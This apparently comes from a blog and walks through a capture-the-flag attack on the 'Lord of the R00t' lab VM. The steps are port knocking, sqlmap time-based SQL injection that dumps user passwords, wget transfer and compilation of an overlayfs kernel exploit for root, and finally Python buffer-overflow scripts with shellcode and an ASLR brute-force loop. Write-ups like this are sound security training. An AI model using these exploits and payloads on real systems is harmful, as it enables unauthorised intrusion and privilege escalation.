Lord of the R00t

finding the target first: (The IP will change in this walk through because I’m changing location….

Nmap scan report for 192.168.0.19
Host is up (0.00044s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 08:00:27:0F:EA:7E (Oracle VirtualBox virtual NIC)

Aouch just ssh?

Let’s run other scans in the meantime:

nmap -A 192.168.0.19
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 15:28 UTC
Nmap scan report for 192.168.0.19
Host is up (0.00035s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
MAC Address: 08:00:27:0F:EA:7E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 – 4.11, Linux 3.16 – 4.6, Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 192.168.0.19

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Still just SSH….

OK, when the VM starts, we see that user smeagol is the default login… Let’s see if it exists…

I found this exploit in the exploitdb database:

OpenSSH 7.2p2 – Username Enumeration | exploits/linux/remote/40136.py

./40136.py
usage: 40136.py [-h] [-u USER | -U USERLIST] [-e] [-s] [–bytes BYTES]
[–samples SAMPLES] [–factor FACTOR] [–trials TRIALS]
host

And user smeagol came back as positive….

So trying to login:

ssh smeagol@192.168.1.104

.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
____ __. __ ___________ .__ .___ ___________ ___________ __
| |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________
| < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \
| | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/
|____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
Easy as 1,2,3
smeagol@192.168.1.104’s password:

The banner says “Knock Friend to Enter”…..

Maybe I just have to knock these ports…

root@kali:~/boxes/lordoftheroot# nmap -sT -r -p1,2,3 192.168.231.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-24 12:34 UTC
Nmap scan report for 192.168.231.128
Host is up (0.00069s latency).

PORT STATE SERVICE
1/tcp filtered tcpmux
2/tcp filtered compressnet
3/tcp filtered compressnet
MAC Address: 00:0C:29:1E:C1:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds
root@kali:~/boxes/lordoftheroot# nmap -p- 192.168.231.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-24 12:35 UTC
Nmap scan report for 192.168.231.128
Host is up (0.00038s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
MAC Address: 00:0C:29:1E:C1:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.45 seconds

Bingo.. got a new port: 1337

I open it in Firefox and got just an image:

Checking if there’s something in the image… Nothing:
root@kali:~/boxes/lordoftheroot# /root/tools/stegextract/stegextract mordor.png
Detected image format: PNG
No trailing data found in file
Performing deep analysis
Done

So trying to enumerate this port a little more:

nmap -Pn -T4 -sV -A -v -p 1337 192.168.231.128

And in the meantime, trying gobuster:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –url http://192.168.231.128:1337 > dirb.txt

The result of the nmap is not very detailed:

ORT STATE SERVICE VERSION
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 00:0C:29:1E:C1:79 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 – 4.11, Linux 3.16 – 4.6, Linux 3.2 – 4.9
Uptime guess: 0.010 days (since Tue Sep 24 12:37:33 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros

Let’s see what gobuster found:

root@kali:~/boxes/lordoftheroot# more dirb.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.231.128:1337
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/24 12:53:40 Starting gobuster
===============================================================
/images (Status: 301)
/server-status (Status: 403)
===============================================================
2019/09/24 12:54:20 Finished
===============================================================

Nothing again…. Maybe Nikto?

root@kali:~/boxes/lordoftheroot# nikto –url http://192.168.231.128:1337
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.231.128
+ Target Hostname: 192.168.231.128
+ Target Port: 1337
+ Start Time: 2019-09-24 12:56:03 (GMT0)
—————————————————————————
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ IP address found in the ‘location’ header. The IP is “127.0.1.1”.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is “127.0.1.1”.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2019-09-24 12:56:53 (GMT0) (50 seconds)
—————————————————————————
+ 1 host(s) tested

Not much

So let’s see what’s in the image directory:

Robots.txt points to the hipster picture!

Let’s try Burp:

GET / HTTP/1.1
Host: 192.168.231.128:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 18 Sep 2015 03:47:46 GMT
If-None-Match: “40-51ffd65196807”
Cache-Control: max-age=0

If I try

GET /legolas HTTP/1.1
Host: 192.168.231.128:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 18 Sep 2015 03:47:46 GMT
If-None-Match: “40-51ffd65196807”
Cache-Control: max-age=0

Then I have:

HTTP/1.1 404 Not Found
Date: Tue, 24 Sep 2019 16:06:34 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 18 Sep 2015 03:47:34 GMT
ETag: “74-51ffd64576fc7″
Accept-Ranges: bytes
Content-Length: 116
Connection: close
Content-Type: text/html

<html>
<img src=”/images/hipster.jpg” align=”middle”>
<!–THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>

Trying to decode the base64 message in the html comment:

Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

Then decode again!

/978345210/index.php

I saved the result of my burp request and ran it into sqlmap:

sqlmap –batch -r burp.req

[13:17:15] [INFO] POST parameter ‘username’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] Y
[13:17:15] [INFO] testing ‘Generic UNION query (NULL) – 1 to 20 columns’
[13:17:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
sqlmap got a 302 redirect to ‘http://192.168.231.128:1337/978345210/profile.php’. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[13:17:16] [INFO] checking if the injection point on POST parameter ‘username’ is a false positive
POST parameter ‘username’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:

Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=smeagol’ AND (SELECT 7638 FROM (SELECT(SLEEP(5)))wbck) AND ‘tVTj’=’tVTj&password=motdepa&submit= Login

[13:17:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[13:17:31] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.231.128’

[*] ending @ 13:17:31 /2019-09-24/

Interesting!

So let’s try to retrieve the data:

sqlmap –batch -r burp.req –dump –method POST –dbms mysql

[13:28:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[13:28:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:28:09] [INFO] fetching current database
[13:28:09] [INFO] retrieved: Webapp
[13:28:29] [INFO] fetching tables for database: ‘Webapp’
[13:28:29] [INFO] fetching number of tables for database ‘Webapp’
[13:28:29] [INFO] retrieved: 1
[13:28:30] [INFO] retrieved: Users
[13:28:46] [INFO] fetching columns for table ‘Users’ in database ‘Webapp’
[13:28:46] [INFO] retrieved: 3
[13:28:49] [INFO] retrieved: id
[13:28:55] [INFO] retrieved: username
[13:29:17] [INFO] retrieved: password
[13:29:45] [INFO] fetching entries for table ‘Users’ in database ‘Webapp’
[13:29:45] [INFO] fetching number of entries for table ‘Users’ in database ‘Webapp’
[13:29:45] [INFO] retrieved: 5
[13:29:47] [WARNING] (case) time-based comparison requires reset of statistical model, please wait………………………… (done)
1
[13:29:49] [INFO] retrieved: iwilltakethering
[13:30:39] [INFO] retrieved: frodo
[13:30:57] [INFO] retrieved: 2
[13:31:00] [INFO] retrieved: MyPreciousR00t
[13:31:48] [INFO] retrieved: smeagol
[13:32:09] [INFO] retrieved: 3
[13:32:12] [INFO] retrieved: AndMySword
[13:32:50] [INFO] retrieved: aragorn
[13:33:10] [INFO] retrieved: 4
[13:33:14] [INFO] retrieved: AndMyBow
[13:33:45] [INFO] retrieved: legolas
[13:34:08] [INFO] retrieved: 5
[13:34:11] [INFO] retrieved: AndMyAxe
[13:34:40] [INFO] retrieved: gimli
Database: Webapp
Table: Users
[5 entries]
+—-+———-+——————+
| id | username | password |
+—-+———-+——————+
| 1 | frodo | iwilltakethering |
| 2 | smeagol | MyPreciousR00t |
| 3 | aragorn | AndMySword |
| 4 | legolas | AndMyBow |
| 5 | gimli | AndMyAxe |
+—-+———-+——————+

When I try these logins, they all send me to profile.php with the following picture:
file:///tmp/tmpHS7GFD/6.png

And a link to log out…

One interesting thing… It should display the login name but doesn’t:
file:///tmp/tmpHS7GFD/7.png

<b id=”welcome”>Welcome : <i></i></b>

Trying to login with ssh:

root@kali:~/boxes/lordoftheroot# ssh smeagol@192.168.231.128

.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
____ __. __ ___________ .__ .___ ___________ ___________ __
| |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________
| < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \
| | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/
|____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
Easy as 1,2,3
smeagol@192.168.231.128’s password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

* Documentation: https://help.ubuntu.com/

.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
__ __ .__ ___________ .__ .___
/ \ / \ ____ | | ____ ____ _____ ____ \_ _____/______|__| ____ ____ __| _/
\ \/\/ // __ \| | _/ ___\/ _ \ / \_/ __ \ | __) \_ __ \ |/ __ \ / \ / __ |
\ /\ ___/| |_\ \__( <_> ) Y Y \ ___/ | \ | | \/ \ ___/| | \/ /_/ |
\__/\ / \___ >____/\___ >____/|__|_| /\___ > \___ / |__| |__|\___ >___| /\____ |
\/ \/ \/ \/ \/ \/ \/ \/ \/
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
smeagol@LordOfTheRoot:~$

Bingo!

It seems like the other logins can’t ssh:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
smeagol:x:1000:1000:smeagol,,,:/home/smeagol:/bin/bash
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin

smeagol@LordOfTheRoot:/etc$ sudo -l
[sudo] password for smeagol:
Sorry, user smeagol may not run sudo on LordOfTheRoot.

So now uploading linenum:

smeagol@LordOfTheRoot:~$ wget http://192.168.1.124:9000/linenum.sh
–2019-09-24 11:03:36– http://192.168.1.124:9000/linenum.sh
Connecting to 192.168.1.124:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: ‘linenum.sh’

100%[==================================================================================================================================================================>] 45,652 –.-K/s in 0.04s

2019-09-24 11:03:36 (1000 KB/s) – ‘linenum.sh’ saved [45652/45652]

smeagol@LordOfTheRoot:~$ chmod +x linenum.sh
smeagol@LordOfTheRoot:~$ ./linenum.sh -t

### SYSTEM ##############################################
[-] Kernel information:
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux

[-] Kernel information (continued):
Linux version 3.19.0-25-generic (buildd@lgw01-57) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION=”Ubuntu 14.04.3 LTS”
NAME=”Ubuntu”
VERSION=”14.04.3 LTS, Trusty Tahr”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 14.04.3 LTS”
VERSION_ID=”14.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”

Looking for an exploit for this old Ubuntu:

Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) – ‘overlayfs’ Local Privilege Escalation (1) | exploits/linux/local/39166.c
root@kali:~/boxes/lordoftheroot/SECRET# cd /usr/share/exploitdb/exploits/linux/local/
root@kali:/usr/share/exploitdb/exploits/linux/local# dos2unix 39166.c

Starting a python http server and transfering the file:

smeagol@LordOfTheRoot:~$ wget http://192.168.1.124:9000/39166.c
–2019-09-25 11:46:01– http://192.168.1.124:9000/39166.c
Connecting to 192.168.1.124:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2680 (2.6K) [text/plain]
Saving to: ‘39166.c’

100%[===========================================================================================================================================>] 2,680 –.-K/s in 0s

2019-09-25 11:46:01 (324 MB/s) – ‘39166.c’ saved [2680/2680]

smeagol@LordOfTheRoot:~$ vi 39166.c
smeagol@LordOfTheRoot:~$ gcc 39166.c -o exploit
smeagol@LordOfTheRoot:~$ chmod +x exploit
smeagol@LordOfTheRoot:~$ ./exploit

root@LordOfTheRoot:~# whoami
root
root@LordOfTheRoot:~# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)

root@LordOfTheRoot:/root# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf

Now there was a buffer overflow possible in the /SECRET directory… but the vulnerable file kept changing location.
I thought I had the right one but failed to find the adress where to inject my code.

But this script explains why it kept changing!

root@LordOfTheRoot:/root# cat switcher.py
#!/usr/bin/python
import os
from random import randint

targets= [“/SECRET/door1/”,”/SECRET/door2/”,”/SECRET/door3/”]
for t in targets:
os.system(“rm “+t+”*”)
os.system(“cp -p other “+t)
os.system(“cp -p “+t+”other “+t+”file”)
os.system(“rm “+t+”other”)

luckyDoor = randint(0,2)
t=targets[luckyDoor]
os.system(“rm “+t+”*”)
os.system(“cp -p buf “+t)
os.system(“cp -p “+t+”buf “+t+”file”)
os.system(“rm “+t+”buf”)

But I still need to figure out why my BOF didn’t work….
ASLR was enable, that one thing. But still … It should have worked!
I’ll try again latter

 

 

————————————————————————————————–

OK.. after a good night I’m back at the BOF part…

I already knew the buffer size, so let’s code the exploit directly:

root@kali:~/boxes/lordoftheroot# cat exploit.py
#!/usr/bin/python
nops = ‘\x90’ *64
shellcode = “\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80”
pad = ‘A’ * (171 – 64 -32) #Buffer minus pad minus shellcode length
eip = ‘1234’
print nops + shellcode + pad + eip

gdb-peda$ run $(cat e3)
Starting program: /root/boxes/lordoftheroot/file $(cat e3)

Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd560 (“AAAAAAA1234”)
EDX: 0xffffd265 (“AAAAAAA1234”)
ESI: 0xf7fa3000 –> 0x1d9d6c
EDI: 0xf7fa3000 –> 0x1d9d6c
EBP: 0x41414141 (‘AAAA’)
ESP: 0xffffd270 –> 0x0

EIP: 0x34333231 (‘1234’)

EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x34333231
[————————————stack————————————-]
0000| 0xffffd270 –> 0x0
0004| 0xffffd274 –> 0xffffd304 –> 0xffffd49d (“/root/boxes/lordoftheroot/file”)
0008| 0xffffd278 –> 0xffffd310 –> 0xffffd56c (“SHELL=/bin/bash”)
0012| 0xffffd27c –> 0xffffd294 –> 0x0
0016| 0xffffd280 –> 0x1
0020| 0xffffd284 –> 0x0
0024| 0xffffd288 –> 0xf7fa3000 –> 0x1d9d6c
0028| 0xffffd28c –> 0xffffffff
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x34333231 in ?? ()
gdb-peda$ infor registers
Undefined command: “infor”. Try “help”.
gdb-peda$ info registers
eax 0x0 0x0
ecx 0xffffd560 0xffffd560
edx 0xffffd265 0xffffd265
ebx 0x0 0x0
esp 0xffffd270 0xffffd270
ebp 0x41414141 0x41414141
esi 0xf7fa3000 0xf7fa3000
edi 0xf7fa3000 0xf7fa3000
eip 0x34333231 0x34333231
eflags 0x10202 [ IF RF ]
cs 0x23 0x23
ss 0x2b 0x2b
ds 0x2b 0x2b
es 0x2b 0x2b
fs 0x0 0x0
gs 0x63 0x63

gdb-peda$ info frame
Stack level 0, frame at 0xffffd274:
eip = 0x34333231; saved eip = 0x0
called by frame at 0xffffd278
Arglist at 0xffffd26c, args:

Locals at 0xffffd26c, Previous frame’s sp is 0xffffd274

Saved registers:
eip at 0xffffd270

So now I control the EIP….

And I have the jump:0xffffd274

import struct
pad = “\x41” *171
EIP = struct.pack(“I”,0xffffd274)
shellcode = “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
NOP = “\x90” * 64
print pad + EIP + NOP + shellcode

On Kali, it works because ASLR is disabled:

root@kali:~/boxes/lordoftheroot# ./file $(python exploit2.py)
# id
uid=0(root) gid=0(root) groups=0(root)
# exit

But on the target, I cannot disable ASLR….

So let’s do it differently:

The process is very well documented here: https://hacked0x90.wordpress.com/2016/10/30/bypassing-aslr-protection-using-brute-force/

First we need to find an address to use…

This small piece of C will dot it for us:

#include <stdlib.h>
int main (int argc, char *argv[]) {
char *addr;
printf(“%p\n”,&addr);
return 0;
}

Compile with gcc -m32

Then execute it and it will give an address to use.
Update the exploit below with this address and run ls -alR /SECRET to see where is the vulnerable executable.
Update quickly the exploit and run it

#!/usr/bin/python
import os
i=1
while True:
eipOffset = 171
RandomAddress = ‘\x8c\x4c\x95\xff’
nopSleds = 20480
shellcode = ‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80’
exploit = (‘A’ * eipOffset) + RandomAddress + (‘\x90’ * nopSleds) + shellcode
print “BruteForce ASLR Trial Number ” + str(i)
os.system(“/root/boxes/lordoftheroot/file” + ‘ ‘ + exploit)
i=i+1

Bam! root after 361 iterations!

Leave a Reply

Your email address will not be published. Required fields are marked *